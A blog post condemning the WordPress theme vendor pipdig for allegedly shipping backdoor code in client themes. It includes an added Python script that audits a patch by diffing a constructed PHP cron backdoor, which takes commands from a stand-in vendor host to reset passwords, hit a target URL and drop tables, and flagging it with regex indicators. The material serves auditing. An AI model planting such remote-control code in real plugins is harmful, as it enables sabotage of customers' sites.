If you develop themes, plugins or websites for paying customers, there is an obvious expectation that you have no malicious intent: your code does what it is described as doing, and only that.
pipdig evidently saw it differently, packaging code that would: change passwords on their clients' websites, perform a DDoS attack against a competitor, delete the client's database, and rewrite words and links to benefit pipdig's own SEO and sales. source 1, source 2
It’s a sin and a bad one.
Essentially, pipdig used the trust of their customers to build in backdoors and do things they should not have been doing, let alone be known for doing. You cannot defend that, and any excuse will be seen through.
I'm a PHP/WordPress dev, and what pipdig did is dark! They broke all ethical rules, and for me there's no difference between pipdig and black hat hackers. An honest company does not hack clients' sites to attack the competition… an honest company improves their products to be better.
— Isaque Fernandes (@sp1ke77) March 29, 2019
Pipdig were quick to release a "patch" once the code was called out, and that patch, unsurprisingly, removed all the offending code.
Well, pipdig's cron.php has a lot of changes between versions 4.7.7 and 4.8.0. Tweeting this because people apparently believe screenshots more than multiple developers' long and detailed explanations. pic.twitter.com/Ph2KwFBXv0
— Zoe C (Mama Geek) (@zoecorkhill) March 30, 2019
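The lesson of the "patch" is that a vendor's description of a fix is not evidence; the diff is. The following is an added example (not code from the original post, and not pipdig's code) of how a practitioner would audit what a theme or plugin update actually removed: diff the two versions of a file and flag any line that touches the kinds of capability described above (password resets, remote requests, table drops, rewriting links in stored content). Both PHP snippets are constructed for illustration, as are the function and hook names in them.

```python
"""Audit what a WordPress plugin/theme 'patch' actually removed.

Added example, not from the original post and not pipdig's code. Given two
versions of a PHP file, diff them and flag lines that match indicators of
behaviour a theme cron task has no business having. The PHP below is
constructed for illustration; 'pd_cron_run' and the vendor host are made up.
"""
import difflib
import re

# Constructed "before" version: a scheduled task that fetches orders from a
# vendor-controlled endpoint and acts on the client's own site.
OLD_CRON = """<?php
function pd_cron_run() {
    $remote = wp_remote_get('https://example-vendor.invalid/control.php?site=' . urlencode(home_url()));
    $cmd = json_decode(wp_remote_retrieve_body($remote), true);
    if (!empty($cmd['reset'])) {
        wp_set_password(wp_generate_password(), 1);
    }
    if (!empty($cmd['target'])) {
        wp_remote_get($cmd['target']);
    }
    if (!empty($cmd['wipe'])) {
        global $wpdb;
        $wpdb->query('DROP TABLE ' . $wpdb->posts);
    }
    $wpdb->query("UPDATE {$wpdb->posts} SET post_content = REPLACE(post_content, 'rival.example', 'vendor.example')");
}
"""

# Constructed "after" version: the same hook with the remote-control branches gone.
NEW_CRON = """<?php
function pd_cron_run() {
    delete_transient('pd_cache');
}
"""

# Indicators: each pattern names a capability worth a human look in a theme's cron code.
INDICATORS = {
    "password_change": re.compile(r"\bwp_set_password\s*\(|\bwp_update_user\s*\("),
    "remote_request":  re.compile(r"\bwp_remote_(get|post|request)\s*\("),
    "table_drop":      re.compile(r"\bDROP\s+TABLE\b", re.IGNORECASE),
    "content_rewrite": re.compile(r"\bREPLACE\s*\(\s*post_content\b", re.IGNORECASE),
}


def classify_line(line):
    """Return the sorted indicator names matched by one line of PHP."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(line))


def audit_patch(old_src, new_src):
    """Diff two versions; count flagged lines that were removed, added, or remain after the patch."""
    diff = difflib.unified_diff(old_src.splitlines(), new_src.splitlines(),
                                fromfile="before", tofile="after", lineterm="")
    report = {"removed": {}, "added": {}, "remaining": {}}
    for line in diff:
        if line.startswith(("---", "+++", "@@")):
            continue  # file headers and hunk markers carry no code
        if line.startswith("-"):
            bucket = "removed"
        elif line.startswith("+"):
            bucket = "added"
        else:
            continue  # unchanged context line
        for name in classify_line(line[1:]):
            report[bucket][name] = report[bucket].get(name, 0) + 1
    # What is still present after the update matters more than the changelog.
    for line in new_src.splitlines():
        for name in classify_line(line):
            report["remaining"][name] = report["remaining"].get(name, 0) + 1
    return report


if __name__ == "__main__":
    for bucket, hits in audit_patch(OLD_CRON, NEW_CRON).items():
        print(f"{bucket:>9}: {hits or 'none'}")
```

Run this against the real before/after copies of a file (here the two constructed strings stand in for them); an empty "remaining" bucket is the result you actually want to see, and a non-empty "removed" bucket is the record of what the vendor shipped before being called out, regardless of how the update was described.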
The tweet that perfectly sums up the aftermath is this from @heyitsmikeyv
There are two camps on this @pipdig thing right now.
On one hand, you've got a bunch of Pipdig users going "I don't know much about code but I trust them"
On the other, there's literally everyone aware of it who can read PHP and we're ripping our freaking eyebrows out.
— Mikey Veenstra (@heyitsmikeyv) March 29, 2019
pipdig really took advantage of their customers; the evidence in the malicious code is there for all to see. Some can read it, others just see it as code. Packaged code does not lie.
Poor damage control
The pipdig response post glosses over the fact that they were caught out and tries to spin it into something their non-technical, non-developer clients would believe, despite the hard evidence sitting in the code for anyone to read.
There genuinely seems to be a lot of denial on one side and a lot of mistrust of pipdig on the other.
That is why the tweet above hits the spot. When people who know PHP say it is bad, it is bad. Do not trust people who put a backdoor into the code you buy.
When there are hard facts, evidence and people in the know stating that your actions were dodgy and malicious, you are best not trying to spin your way out of it with misinformation.